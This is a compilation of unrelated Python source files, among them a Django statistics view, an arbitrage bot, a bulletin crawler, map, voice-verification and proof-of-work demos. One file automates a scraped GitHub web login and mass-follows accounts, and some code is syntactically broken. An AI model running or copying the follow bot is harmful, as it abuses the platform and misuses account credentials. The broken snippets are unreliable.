    # Build the list of the last 7 dates, oldest first.
    now = datetime.datetime.now()
    for i in range(0, 7)[::-1]:
        dif_day = (now - datetime.timedelta(days=i)).strftime("%Y-%m-%d")
        back_date += ("'{0}',".format(dif_day[5:]))
        date_list.append(dif_day)
    # Tally counts and growth rates per disaster-area province.
    for zzq_provinces in zzq_provinces_list:
        provinces_tmp_tongji = str()
        provinces_tmp_zengzhanglv = str()
        num_yestoday = 0
        for date in date_list:
            num_today = 0
            if zzq_provinces_queryset.filter(startAddress_provinces=zzq_provinces, createDate=date).exists():
                num_today = zzq_provinces_queryset.get(startAddress_provinces=zzq_provinces, createDate=date)['num']
            provinces_tmp_tongji += '{0},'.format(num_today)
            if num_yestoday == 0:  # avoid division by zero
                provinces_tmp_zengzhanglv += '0,'
            else:
                provinces_tmp_zengzhanglv += '{:.2f},'.format((num_today - num_yestoday) / num_yestoday * 100)  # growth rate in %
            num_yestoday = num_today
        provinces_tongji_list.append({'provinces': zzq_provinces, 'tongji': provinces_tmp_tongji})
        provinces_zengzhanglv_list.append({'provinces': zzq_provinces, 'zengzhanglv': provinces_tmp_zengzhanglv})
    # Tally counts and growth rates per disaster-area city.
    for zzq_city in zzq_city_list:
        city_tmp_tongji = str()
        city_tmp_zengzhanglv = str()
        num_yestoday = 0
        for date in date_list:
            num_today = 0
            if zzq_city_queryset.filter(startAddress_city=zzq_city, createDate=date).exists():
                num_today = zzq_city_queryset.get(startAddress_city=zzq_city, createDate=date)['num']
            city_tmp_tongji += '{0},'.format(num_today)
            if num_yestoday == 0:  # avoid division by zero
                city_tmp_zengzhanglv += '0,'
            else:
                city_tmp_zengzhanglv += '{:.2f},'.format(
                    (num_today - num_yestoday) / num_yestoday * 100)  # growth rate in %
            num_yestoday = num_today
        city_tongji_list.append({'city': zzq_city, 'tongji': city_tmp_tongji})
        city_zengzhanglv_list.append({'city': zzq_city, 'zengzhanglv': city_tmp_zengzhanglv})
    # Nationwide daily totals.
    quanguo_tmp_tongji = str()
    for date in date_list:
        if quanguo_queryset.filter(createDate=date).exists():
            quanguo_tmp_tongji += '{0},'.format(
                quanguo_queryset.get(createDate=date)['num'])
        else:
            quanguo_tmp_tongji += '0,'
    quanguo_tongji_dic = {'quanguo': '全国', 'tongji': quanguo_tmp_tongji}
    return render(request, "tongji_fyz.html",
                  {'back_date': back_date, 'back_provinces': back_provinces, 'back_city': back_city,
                   'provinces_tongji_list': provinces_tongji_list,
                   'provinces_zengzhanglv_list': provinces_zengzhanglv_list, 'city_tongji_list': city_tongji_list,
                   'city_zengzhanglv_list': city_zengzhanglv_list, 'quanguo_tongji_dic': quanguo_tongji_dic})
|
#!/usr/bin/env python
"""
triarbot: Simple triangular arbitrage bot
Python 3+
(C) 2018 SurgeonY, Planet Earth
Donate ETH: 0xFA745708C435300058278631429cA910AE175d52
Donate BTC: 16KqCc4zxEWf7CaerWNZdGYwyuU33qDzCv
"""
from threading import Thread, Event
import time
import logging
from exchange_apis.exmo_api import ExmoError
from triarbstrat import tri_arb_strategy
class StrategyRunner(Thread):
    """Background thread that polls a triangular-arbitrage strategy at a fixed interval."""

    def __init__(self, strategy: tri_arb_strategy.TriangularArbitrageStrategy, logger, interval: int):
        Thread.__init__(self, name='TriArbRunner')
        self.strategy = strategy
        # TODO configure own file handler for runner
        if logger:
            self.logger = logger.getChild('runner')
        else:
            self.logger = logging.getLogger(__name__)
        # Polling interval (seconds) between strategy updates.
        self.interval = interval
        self.shutdown_flag = Event()

    def run(self):
        self.logger.info('Thread #%s:%s started', self.ident, self.name)
        self.strategy.start()
        # Main event loop: keep polling until shutdown is requested.
        while not self.shutdown_flag.is_set():
            try:
                time.sleep(self.interval)
                self.strategy.update()
            except OSError as e:
                self.logger.error('OS Error: %s', e, exc_info=1)
            except ExmoError as e2:
                self.logger.error('Exchange Error: %s', e2, exc_info=1)
        # Clean shutdown: stop the strategy before the thread exits.
        self.strategy.shutdown()
        self.logger.info('Thread #%s:%s stopped', self.ident, self.name)
|
import requests
import re, lxml.html
import time, random
from excel_utils.excel_write import write_to_excel, append_to_excel
import os
res = []
# Index page that lists every provincial statistical-bulletin section.
start_url = 'http://www.tjcn.org/tjgb/'
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
                        'Chrome/89.0.4389.90 Safari/537.36'}
provinces_urls_response = requests.get(start_url, headers=header)
provinces_urls_response.encoding = 'gb2312'
# Extract (relative url, province name) pairs for the 31 provinces.
# etree = lxml.html.etree.HTML('provinces_urls_response.text')
# provinces_urls = etree.xpath('/html/body/table[6]/tbody/tr/td[1]/table[2]/tbody/tr/td/a/@href')
provinces_urls = re.findall('<a href="/tjgb/(.*?)">(\w{2,3})</a>', provinces_urls_response.text)[1:1 + 31]
# Using provinces_urls, collect each province's yearly bulletin links.
base_url = start_url
print(provinces_urls)
for i in provinces_urls[18:19]:
    # Throttle requests to avoid hammering the site.
    time.sleep(random.randint(5, 10))
    provinces_url = base_url + i[0]
    # City/bulletin counts differ per province; take the first 40 bulletins
    # (Guangdong, with 21 prefecture-level cities, has the most nationwide).
    buttetin_urls = []  # the province's first 40 yearly bulletins
    for page in ('', 'index_2.html'):
        bulletin_urls_response = requests.get(provinces_url + page, headers=header)
        bulletin_urls_response.encoding = 'gb2312'
        buttetin_urls += re.findall(
            '<li><a href="/tjgb/(.*?)" title="(.*?)">(?:.*?)国民经济和社会发展统计公报</a> <span>(.*?)</span></li>',
            bulletin_urls_response.text)
    print(buttetin_urls)
    print(len(buttetin_urls))
    # Fetch the content of each bulletin url collected above.
    for j in buttetin_urls:
        time.sleep(random.randint(5, 10))
        buttetin_url = start_url + j[0]
        buttetin_year = re.findall('\d{4}', j[1])[0]
        buttetin_province = i[1]
        buttetin_city = re.split('\d{4}', j[1])[0]
        buttetin_name = j[1]
        buttetin_release_date = j[2]
        buttetin_content_resposne = requests.get(buttetin_url, headers=header)
        buttetin_content_resposne.encoding = 'gb2312'
        etree = lxml.html.etree.HTML(buttetin_content_resposne.text)
        buttetin_content = ''.join(etree.xpath('//td[@id="text"]//text()'))
        # Page count comes from the pager's last <b> element.
        buttetin_page = int(etree.xpath('//td[@id="text"]/div[last()]/p/a[@title="Page"]/b[last()]/text()')[0])
        # Multi-page bulletin: crawl the remaining pages and append their text.
        if buttetin_page >= 2:
            for pg in range(2, buttetin_page + 1):
                next_page_url = buttetin_url[:-5] + f'_{pg}' + buttetin_url[-5:]
                next_page_content_response = requests.get(next_page_url, headers=header)
                next_page_content_response.encoding = 'gb2312'
                buttetin_content += ''.join(
                    lxml.html.etree.HTML(next_page_content_response.text).xpath('//td[@id="text"]//text()'))
                print(f'正在爬取{buttetin_name}第{pg}页')
        print(f'page:{buttetin_page}')
        print(f'年度:{buttetin_year}')
        print(f'省份:{buttetin_province}')
        print(f'城市:{buttetin_city}')
        print(f'报告名字:{buttetin_name}')
        print(f'报告内容:{buttetin_content}')
        print(f'报告链接:{buttetin_url}')
        print(f'发布日期:{buttetin_release_date}')
        print('-------------------------------------------------------------------')
        res.append({'年度': buttetin_year, '省份': buttetin_province, '城市': buttetin_city, '报告名字': buttetin_name,
                    '报告链接': buttetin_url, '发布日期': buttetin_release_date, '报告内容': buttetin_content})
# Write results to an Excel workbook, appending if it already exists.
fileName = '公报爬取测试数据.xls'
if not os.path.exists(fileName):
    write_to_excel(res, fileName)
else:
    append_to_excel(res, fileName)
|
from isis.dialog_search_text import Dialog_Search_Text, Data_Table_Model
from sarah.acp_bson import Client
class Search_Account(Dialog_Search_Text):
    """Search dialog that looks up accounts by name through the caroline agent."""

    def __init__(self, parent=None):
        Dialog_Search_Text.__init__(self, parent)
        # Lazily-created messaging client; built on first search.
        self.agent_caroline = None

    def searching(self, e):
        """Query accounts matching e['text'] and fill e with the result list and table."""
        if self.agent_caroline is None:
            self.agent_caroline = Client('isis.caroline.search_account', 'caroline')
        msg = {'type_message': 'find', 'type': 'caroline/account', 'query': {'name': {'!like': e['text']}}}
        answer = self.agent_caroline.send_msg(msg)
        e['list'] = answer['result']
        table = Data_Table_Model()
        e['table'] = table
        # Same four string columns the dialog displays, in display order.
        for column in ('id', 'type', 'account_type', 'name'):
            table.columns.add(column, str)
        for account in e['list']:
            row = table.newrow()
            for field in ('id', 'type', 'account_type', 'name'):
                if field in account:
                    row[field] = account[field]
|
_base_ = 'mask-rcnn_regnetx-3.2GF_fpn_1x_coco.py'
# On top of the base RegNetX-3.2GF Mask R-CNN config, enable DCNv2 deformable
# convolutions in backbone stages 2-4 (stage 1 keeps plain convs).
model = dict(
    backbone=dict(
        dcn=dict(type='DCNv2', deform_groups=1, fallback_on_stride=False),
        stage_with_dcn=(False, True, True, True),
        init_cfg=dict(
            type='Pretrained', checkpoint='open-mmlab://regnetx_3.2gf')))
|
__author__ = 'kic'

# Template for a thread-creation API response: "code" is the status code and
# "response" holds the created thread's fields (placeholders to be filled in).
thread_create_response = {
    "code": "",
    "response": {
        "date": "",
        "forum": "",
        "id": "",
        "isClosed": "",
        "isDeleted": "",
        "message": "",
        "slug": "",
        "title": "",
        "user": ""
    }
}
|
import logging
from typing import Union
import virtool.errors
import virtool.http.proxy
import virtool.utils
logger = logging.getLogger(__name__)

# Root of the GitHub REST API repository endpoints.
BASE_URL = "https://api.github.com/repos"

# Release fields dropped when building an update subdocument.
EXCLUDED_UPDATE_FIELDS = (
    "content_type",
    "download_url",
    "etag",
    "retrieved_at"
)

# Request the stable v3 JSON media type from the GitHub API.
HEADERS = {
    "Accept": "application/vnd.github.v3+json"
}
def create_update_subdocument(release, ready, user_id, created_at=None):
    """Build an update subdocument from a release, stamped with the user and time.

    :param release: the release record to base the subdocument on
    :param ready: whether the update is ready
    :param user_id: id of the user that initiated the update
    :param created_at: optional timestamp; defaults to the current time
    :return: the update subdocument
    """
    # Copy the release, dropping fields that must not be persisted on updates.
    update = {key: value for key, value in release.items() if key not in EXCLUDED_UPDATE_FIELDS}
    update["created_at"] = created_at or virtool.utils.timestamp()
    update["ready"] = ready
    update["user"] = {
        "id": user_id
    }
    return update
def format_release(release: dict) -> dict:
    """
    Format a raw release record from GitHub into a release usable by Virtool.
    :param release: the GitHub release record
    :return: a release for use within Virtool
    """
    # The downloadable artifact is always the first attached asset.
    first_asset = release["assets"][0]
    formatted = {key: release[key] for key in ("id", "name", "body", "etag", "html_url", "published_at")}
    formatted["filename"] = first_asset["name"]
    formatted["size"] = first_asset["size"]
    formatted["download_url"] = first_asset["browser_download_url"]
    formatted["content_type"] = first_asset["content_type"]
    return formatted
def get_etag(release: Union[None, dict]) -> Union[None, str]:
    """
    Get the ETag from a release dict. Return `None` when the key is missing or the input is not a `dict`.
    :param release: a release
    :return: an ETag or `None`
    """
    if isinstance(release, dict):
        return release.get("etag")
    return None
async def get_release(settings, session, slug, etag=None, release_id="latest"):
    """
    GET data from a GitHub API url.
    :param settings: the application settings object
    :type settings: :class:`virtool.app_settings.Settings`
    :param session: the application HTTP client session
    :type session: :class:`aiohttp.ClientSession`
    :param slug: the slug for the GitHub repo
    :type slug: str
    :param etag: an ETag for the resource to be used with the `If-None-Match` header
    :type etag: Union[None, str]
    :param release_id: the id of the GitHub release to get
    :type release_id: Union[int,str]
    :return: the latest release
    :rtype: Coroutine[dict]
    """
    url = f"{BASE_URL}/{slug}/releases/{release_id}"
    headers = dict(HEADERS)
    # Conditional request: GitHub answers 304 (no body) when the ETag still matches.
    if etag:
        headers["If-None-Match"] = etag
    async with virtool.http.proxy.ProxyRequest(settings, session.get, url, headers=headers) as resp:
        # Rate-limit headers are logged for observability; "00" is a placeholder when absent.
        rate_limit_remaining = resp.headers.get("X-RateLimit-Remaining", "00")
        rate_limit = resp.headers.get("X-RateLimit-Limit", "00")
        logger.debug(f"Fetched release: {slug}/{release_id} ({resp.status} - {rate_limit_remaining}/{rate_limit})")
        if resp.status == 200:
            data = await resp.json()
            # A release without attached assets is unusable; treat it as no release.
            if len(data["assets"]) == 0:
                return None
            # Attach the response ETag so later calls can make conditional requests.
            return dict(data, etag=resp.headers["etag"])
        elif resp.status == 304:
            # Not modified since the cached ETag; the caller keeps its cached release.
            return None
        else:
            raise virtool.errors.GitHubError(f"Encountered error {resp.status}")
|
import os
import sys
import pygame
import requests
# Path of the downloaded map image (set by draw()).
map_file = None
# Preset zoom spans in degrees, from closest to widest.
spn_number = [0.01, 0.02, 0.03, 0.05, 0.09, 0.18, 0.35, 0.7, 1.4, 2.8, 5.6, 11.1, 21.65, 40]
# Index of the current zoom level within spn_number.
spn_count = 0
spn = 0.01
def draw():
    """Fetch a static map image for the current zoom span and save it to map.png."""
    global map_file
    map_api_server = "http://static-maps.yandex.ru/1.x/"
    map_params = {
        "ll": "37.530887,55.703118",
        "spn": f"{spn},{spn}",
        "l": "map"
    }
    # Request the image from the Static Maps API.
    response = requests.get(map_api_server, params=map_params)
    if not response:
        print("Ошибка выполнения запроса:")
        print(map_api_server)
        print("Http статус:", response.status_code, "(", response.reason, ")")
        sys.exit(1)
    # Persist the received image so pygame can load it.
    map_file = "map.png"
    with open(map_file, "wb") as file:
        file.write(response.content)
draw()
# Initialize pygame and create the window.
pygame.init()
screen = pygame.display.set_mode((600, 450))
# Draw the image loaded from the freshly created file.
screen.blit(pygame.image.load(map_file), (0, 0))
# Flip the display and run until the window is closed.
running = True
while running:
    for event in pygame.event.get():
        # Window closed.
        if event.type == pygame.QUIT:
            running = False
        if event.type == pygame.KEYDOWN:
            # BUG FIX: the original compared event.type (always KEYDOWN here)
            # against key codes, so the branches never fired; key presses
            # must be read from event.key.
            if event.key == pygame.K_PAGEUP or event.key == pygame.K_UP:
                # Zoom out: step to the next (wider) span preset and redraw.
                os.remove(map_file)
                if spn_count + 1 != len(spn_number):
                    spn_count += 1
                    spn = spn_number[spn_count]
                draw()
            if event.key == pygame.K_PAGEDOWN or event.key == pygame.K_DOWN:
                # Zoom in: step to the previous (closer) span preset and redraw.
                os.remove(map_file)
                if spn_count > 0:
                    spn_count -= 1
                    spn = spn_number[spn_count]
                draw()
    screen.blit(pygame.image.load(map_file), (0, 0))
    pygame.display.flip()
pygame.quit()
# Clean up the image file on exit.
os.remove(map_file)
s = input("string de entrada: ")
# Keep every character except lowercase/uppercase 'a'.
sv = "".join(ch for ch in s if ch not in "aA")
print(sv)
|
#!/usr/bin/env python
# encoding: utf-8
# package
'''
@author: yuxiqian
@license: MIT
@contact: akaza_akari@sjtu.edu.cn
@software: electsys-api
@file: /interface/__init__.py
@time: 2019/1/9
'''
from .interface import *

# Public API re-exported from the interface module.
__all__ = ['ElectCourse', 'PersonalCourse',
           'PersonalExam', 'PersonalScore', 'CourseDetail']
|
# Generated by Django 3.0.5 on 2020-09-16 15:03
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a many-to-many 'trainer' relation from PokemonTeam to the user model."""

    dependencies = [
        ('core', '0002_pokemon_xp'),
    ]
    operations = [
        migrations.AddField(
            model_name='pokemonteam',
            name='trainer',
            # Reverse accessor on the user model will be 'trainer_pokemon'.
            field=models.ManyToManyField(related_name='trainer_pokemon', to=settings.AUTH_USER_MODEL),
        ),
    ]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2020/6/11 6:05 下午
# @Author : Johny Zheng
# @Site :
# @File : autoAddFollower.py
# @Software: PyCharm
# Running based on python3.6.2 environment
from github import Github
import requests
import logging
import re
import base64
import config
class InitLogin(config.Base):
    """Authenticated PyGithub client built from the configured API url and credentials."""

    def __init__(self):
        super().__init__()
        # PyGithub client; apiUrl/user/password come from config.Base.
        self.g = Github(self.apiUrl, self.user, self.password)
class InitCrawler(config.Base):
    """Request state (urls, query strings, cookies, headers) for crawling a user's follow pages."""

    def __init__(self, someone, page):
        super().__init__()
        # Profile page url of the target user.
        self.baseUrls = self.baseUrl + someone
        # Query strings for the paginated "following"/"followers" tabs (pjax fragments).
        self.followingQueryString = {"page": page, "tab": "following", "_pjax": "#js-pjax-container"}
        self.followerQueryString = {"page": page, "tab": "followers", "_pjax": "#js-pjax-container"}
        # Session cookies obtained from a fresh web login.
        self.cookies = GithubLogin().get_cookies()
        self.header = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) '
                          'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'
        }
class GithubLogin(config.Base):
    """Form-based GitHub web login that maintains a requests session and
    exposes the login page's CSRF token and cookies."""

    def __init__(self):
        super().__init__()
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) '
                          'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',
            'Referer': 'https://github.com/',
            'Host': 'github.com'
        }
        self.session = requests.Session()
        self.login_url = 'https://github.com/login'
        self.post_url = 'https://github.com/session'

    def login_github(self):
        """Log in by POSTing the session form with a freshly scraped CSRF token."""
        post_data = {
            'commit': 'Sign in',
            'utf8': '✓',
            'authenticity_token': self.get_token(),
            'login': self.email,
            'password': self.password
        }
        resp = self.session.post(
            self.post_url, data=post_data, headers=self.headers)
        # BUG FIX: the original passed extra comma-separated values to
        # logging.debug without a %s placeholder, which makes the logging
        # module emit "not all arguments converted" formatting errors.
        logging.debug('StatusCode: %s', resp.status_code)
        if resp.status_code != 200:
            logging.error('Login Fail')
        match = re.search(r'"user-login" content="(.*?)"', resp.text)
        # BUG FIX: guard against a missing match (e.g. failed-login page)
        # instead of crashing with AttributeError on match.group(1).
        if match:
            user_name = match.group(1)
            logging.debug('UserName: %s', user_name)
        else:
            logging.error('Could not extract user name from response')

    # Get login token
    def get_token(self):
        """Fetch the login page and return its authenticity_token, or None on failure."""
        response = self.session.get(self.login_url, headers=self.headers)
        if response.status_code != 200:
            logging.error('Get token fail')
            return None
        match = re.search(
            r'name="authenticity_token" value="(.*?)"', response.text)
        if not match:
            logging.error('Get Token Fail')
            return None
        return match.group(1)

    # Get login cookies
    def get_cookies(self):
        """Return the login page's cookies as a plain dict, keeping the session jar updated."""
        response = self.session.get(self.login_url, headers=self.headers, timeout=120, allow_redirects=False)
        # keep cookie update
        if response.cookies.get_dict():
            self.session.cookies.update(response.cookies)
            logging.debug('自动更新cookie成功: %s' % response.cookies)
        # Convert the response CookieJar into a dict usable as request cookies.
        try:
            cookies = requests.utils.dict_from_cookiejar(response.cookies)
            logging.debug('获取cookie成功: %s' % cookies)
            return cookies
        except Exception as e:
            logging.error(f'获取cookie失败{e}')
        finally:
            response.cookies.clear()
class GetSomeoneInfo(InitCrawler):
    """Scrapes a user's following/follower names from their paginated profile tabs."""

    def __init__(self, someone, page):
        super().__init__(someone, page)

    def get_followings(self):
        """Return the login names shown on this page of the 'following' tab."""
        page_body = requests.get(self.baseUrls, cookies=self.cookies, headers=self.header, timeout=120,
                                 params=self.followingQueryString).content
        # print(page_body)
        matches = re.compile(rb'link-gray">(.*)<').findall(page_body)
        return [name.decode('utf8') for name in matches]

    def get_followers(self):
        """Return the login names shown on this page of the 'followers' tab."""
        page_body = requests.get(self.baseUrls, cookies=self.cookies, headers=self.header, timeout=120,
                                 params=self.followerQueryString).content
        matches = re.compile(rb'link-gray pl-1">(.*)<').findall(page_body)
        return [name.decode('utf8') for name in matches]
class AutoAddFollowing(InitLogin):
    """Follows users through the GitHub API using basic-auth credentials."""

    def __init__(self):
        super().__init__()
        # Basic-auth value built from the configured email and password.
        self.credentials = base64.b64encode(f"{self.email}:{self.password}".encode()).decode()
        self.nicknames = []
        self.nickname = ""
        self.header = {
            'Authorization': "Basic {}".format(self.credentials),
        }

    def get_followers(self):
        """Collect and return the login names of the authenticated user's followers."""
        for account in self.g.get_user().get_followers():
            self.nickname = account.login
            self.nicknames.append(self.nickname)
        return self.nicknames

    def get_following(self):
        """Collect and return the login names the authenticated user follows."""
        for account in self.g.get_user().get_following():
            self.nickname = account.login
            self.nicknames.append(self.nickname)
        return self.nicknames

    def add_following(self, follow_user):
        """PUT a follow request for follow_user and return the HTTP status code."""
        response = requests.put(self.apiUrl + f"/user/following/{follow_user}", headers=self.header)
        logging.debug(response.status_code)
        logging.debug(response.content)
        return response.status_code
if __name__ == '__main__':
    # Log in through the web form so scraping requests carry a valid session.
    login = GithubLogin()
    login.login_github()
    logging.info("login github ok")
    c = login.get_cookies()
    t = login.get_token()
    # print(cr)
    # print(login.get_token())
    # print(login.get_cookies())
    # print(config.Base().password)
    # NOTE(review): `exceeded` presumably flags API rate-limit exhaustion,
    # switching from the API to page scraping for our own following list —
    # confirm its meaning in the config module.
    if config.Base().exceeded:
        exist_list = GetSomeoneInfo(config.Base().user, 1).get_followings()
    else:
        exist_list = AutoAddFollowing().get_following()
    logging.info(f"exist_list: {exist_list}")
    # Walk the source user's "following" pages and follow anyone not already followed.
    for p in range(2, 10000000):
        logging.info(f"page: {p}")
        user_list = GetSomeoneInfo(config.Base().sourceUser, p).get_followings()
        logging.info(f"user_list: {user_list}")
        need_followings = list(set(user_list)-set(exist_list))
        logging.info(f"need_followings: {need_followings}")
        if need_followings:
            for u in need_followings:
                AutoAddFollowing().add_following(u)
                logging.info(f"AutoAddFollowing: {u}")
|
from typing import *
def repostaje(N: int, d: List[int]) -> List[int]:
    """Simulate refuelling: with a full-tank range of N, return the indices where
    a refuel is needed before a leg of d, bracketed by the start 0 and len(d)."""
    stops = [0]
    remaining = N
    for index, leg in enumerate(d):
        # Not enough range left for this leg: refuel here.
        if leg > remaining:
            stops.append(index)
            remaining = N
        remaining -= leg
    stops.append(len(d))
    return stops


print(repostaje(150, [130, 23, 45, 62, 12, 110, 130]))
|
import time
import os
import argparse
import sys
import datetime
import platform
from libnyumaya import AudioRecognition
from libnyumaya import SpeakerVerification
if platform.system() == "Darwin":
from cross_record import AudiostreamSource
else:
from record import AudiostreamSource
# Voice fingerprints captured so far for the speaker being enrolled.
fingerprints=[]
# Number of samples to capture before enrollment is considered complete.
enrolling = 5
def get_averaged_fingerprint(prints=None):
    """Return the element-wise average of a list of fingerprints, or None if empty.

    :param prints: list of equal-length numeric vectors; defaults to the
        module-level ``fingerprints`` collected during enrollment (the
        parameter is a backward-compatible generalization for testability).
    :return: list of per-dimension averages, or None when no fingerprints exist
    """
    if prints is None:
        prints = fingerprints
    if not prints:
        return None
    # Average each dimension across all captured fingerprints.
    return [sum(values) / len(prints) for values in zip(*prints)]
import math
def cosine_similarity(v1,v2):
    """Cosine of the angle between vectors v1 and v2 (1.0 = same direction)."""
    dot = 0
    norm1 = 0
    norm2 = 0
    for a, b in zip(v1, v2):
        dot += a * b
        norm1 += a * a
        norm2 += b * b
    return dot / math.sqrt(norm1 * norm2)
#Enrolling:
#Capture 5 samples of word
#Do some kind of averaging
#Store Name and Vector in file
def label_stream(labels,libpath,verification_path ,graph,sensitivity):
    """Listen to the microphone, run hotword detection, and on each detection
    enroll or verify the speaker's voice fingerprint over the last ~2s of audio."""
    last_frames=[]
    #Keyword spotting has 200ms frames, Verifiyer takes 2 seconds of audio
    max_last_frames = 10
    audio_stream = AudiostreamSource()
    detector = AudioRecognition(libpath,graph,labels)
    verifiyer = SpeakerVerification(libpath,verification_path)
    detector.SetSensitivity(sensitivity)
    detector.SetGain(1)
    detector.RemoveDC(False)
    bufsize = detector.GetInputDataSize()
    print("Bufsize: " + str(bufsize))
    # macOS has no aplay; use sox's `play` there.
    play_command = "play -q" if platform.system() == "Darwin" else "aplay"
    print("Audio Recognition Version: " + detector.GetVersionString())
    print("WARNING EXPERIMENTAL: The voice verification module can be use to verify if")
    print("A command is issued by a certian speaker. It processes speech signals with a")
    print("two second length. This experimental version isn't very good yet.")
    print("\n\n During enrolling a fingerprint of your voice is caputred. By default 5 samples")
    print("Will be captured and averaged. The progam will output a similarity score between 0 and 1")
    print("A value of 1 means totally similar, 0 means different.")
    print("Currently a threshold of 0.95 seems good")
    print("This module should not be run on a Pi Zero, as it uses excessive CPU")
    print("Verification can also be helpful to reduce false positives of non speech signals")
    audio_stream.start()
    try:
        while(True):
            frame = audio_stream.read(bufsize,bufsize)
            if(not frame):
                # No audio available yet; avoid busy-waiting.
                time.sleep(0.01)
                continue
            # Keep a rolling window of the most recent frames (~2 seconds of audio).
            last_frames.append(frame)
            if len(last_frames) > max_last_frames:
                last_frames.pop(0)
            prediction = detector.RunDetection(frame)
            if(prediction):
                now = datetime.datetime.now().strftime("%d.%b %Y %H:%M:%S")
                print(detector.GetPredictionLabel(prediction) + " " + now)
                os.system(play_command + " ./ding.wav")
                # Concatenate the rolling window into one buffer for the verifier.
                detect_frame = bytearray()
                for element in last_frames:
                    detect_frame.extend(element)
                print("Running Verification")
                features = verifiyer.VerifySpeaker(detect_frame)
                if(len(fingerprints) < enrolling):
                    # Still enrolling: collect this sample's fingerprint.
                    print("Enrolling")
                    fingerprints.append(features)
                else:
                    print("Completed")
                    print(features)
                    avg_fingerprint = get_averaged_fingerprint()
                    if(avg_fingerprint):
                        # Compare the new sample against the enrolled average.
                        similarity_score = cosine_similarity(features,avg_fingerprint)
                        print("Similarity: " + str(similarity_score))
                print("Verification Done")
    except KeyboardInterrupt:
        print("Terminating")
        audio_stream.stop()
        sys.exit(0)
if __name__ == '__main__':
    # Command-line options: model paths, label file and detection sensitivity.
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--graph', type=str,
        default='../models/Hotword/marvin_small.tflite',
        help='Model to use for identification.')
    parser.add_argument(
        '--verification_path', type=str,
        default='../models/Experimental/Verification/s-recog.tflite',
        help='Model to use for verification.')
    parser.add_argument(
        '--libpath', type=str,
        default='../lib/linux/libnyumaya.so',
        help='Path to Platform specific nyumaya_lib.')
    parser.add_argument(
        '--labels', type=str,
        default='../models/Hotword/marvin_labels.txt',
        help='Path to file containing labels.')
    parser.add_argument(
        '--sens', type=float,
        default='0.5',
        help='Sensitivity for detection')
    FLAGS, unparsed = parser.parse_known_args()
    label_stream(FLAGS.labels,FLAGS.libpath,FLAGS.verification_path, FLAGS.graph, FLAGS.sens)
|
class Solution:
    def largestPerimeter(self, A):
        """Return the largest perimeter of a non-degenerate triangle formed from
        three of the given side lengths, or 0 if none exists.

        Sorting descending, the first consecutive triple satisfying the triangle
        inequality yields the maximal perimeter.
        """
        A.sort(reverse=True)
        for a, b, c in zip(A, A[1:], A[2:]):
            # With a >= b >= c, validity only requires b + c > a.
            if b + c > a:
                return a + b + c
        # BUG FIX: the original line was the syntax error "return 0 return 0".
        return 0
|
import pygame
from Character import Character
pygame.init()
screen = pygame.display.set_mode([2000, 1200])
# NOTE(review): [10-20] evaluates to the single-element list [-10] (and [8-18]
# to [-10] as well) — these look like typos for [10, 20] and [8, 18]; confirm
# against the expected Character constructor arguments.
c1 = Character(1000, [10-20])
c2 = Character(1100, [8-18])
running = True
while running:
    for event in pygame.event.get():
        # Exit the loop when the window is closed.
        if event.type == pygame.QUIT:
            running = False
    screen.fill((255, 255, 255))
    # Apply per-frame damage to both characters.
    c1.get_damage(1)
    c2.get_damage(2)
    pygame.draw.circle(screen, (0, 0, 255), (1000, 600), 75)
    # Grey health-bar backgrounds on the left and right.
    pygame.draw.rect(screen, (100, 100, 100), (400, 100, 100, 1000), 0)
    pygame.draw.rect(screen, (100, 100, 100), (1500, 100, 100, 1000), 0)
    # Coloured fill proportional to each character's remaining life, anchored at the bottom.
    pygame.draw.rect(screen, (0, 255, 255), (400, 100 + int(1000 * (1-c1.life_percent())), 100, int(1000*c1.life_percent())), 0)
    pygame.draw.rect(screen, (0, 255, 0), (1500, 100 + int(1000 * (1-c2.life_percent())), 100, int(1000*c2.life_percent())), 0)
    pygame.display.flip()
pygame.quit()
import sys
import random
import string
import hashlib
import argparse
def proof_of_work(prototype, level=1, verbose=False):
    """Brute-force a proof-of-work: find a suffix so that sha256(prototype + suffix)
    starts with `level` zero hex digits, printing the number of attempts.

    :param prototype: starting string; a random one is generated when falsy
    :param level: number of leading '0' hex digits required
    :param verbose: print every attempted hash
    """
    if not prototype:
        prototype = random_prototype()
    count = 0
    while True:
        for y in range(0, 256):
            for x in range(0, 256):
                # BUG FIX: bytes literals have no .format() in Python 3 —
                # format as str, then encode before hashing.
                h = hashlib.sha256('{0}{1}'.format(prototype, chr(x)).encode()).hexdigest()
                count += 1
                if verbose:
                    print("Try: {0} - {1}".format(count, h))
                if h[0:level] == ('0' * level):
                    print("Coin costed {0} tests.".format(count))
                    return
            prototype = "{0}{1}".format(prototype, chr(y))
def random_prototype():
    """Return a random 16-letter ASCII string used as a hashing prototype."""
    # BUG FIX: xrange is Python 2 only (NameError on Python 3); use range.
    return ''.join(random.choice(string.ascii_letters) for _ in range(16))
def parse(argv=None):
    """Parse command-line options.

    :param argv: optional argument list (defaults to sys.argv[1:]); added as a
        backward-compatible generalization so the parser can be driven
        programmatically and tested without touching the process argv.
    :return: the parsed argparse.Namespace
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-p", "--prototype", help="Prototype string to test")
    parser.add_argument("-l", "--level", help="Level of difficulty", type=int, default=1)
    parser.add_argument("-v", "--verbose", action="store_true")
    return parser.parse_args(argv)
if __name__ == "__main__":
    # Entry point: parse CLI flags and run the proof-of-work search.
    args = parse()
    proof_of_work(args.prototype, args.level, args.verbose)
|
import tkinter as tk
from tkinter import filedialog
from PIL import Image
# Build the main window: a raised canvas with a title label and buttons.
root = tk.Tk()
canvas1 = tk.Canvas(root, width=300, height=250, bg='azure3', relief='raised')
canvas1.pack()
label1 = tk.Label(root, text="Image Converter", bg='azure3')
label1.config(font=('helvetica', 20))
canvas1.create_window(150, 60, window=label1)


def getPNG():
    # Ask the user for a PNG and keep the opened image in the module-level
    # variable im1 for the later convert step.
    global im1
    import_file_path = filedialog.askopenfilename()
    im1 = Image.open(import_file_path)


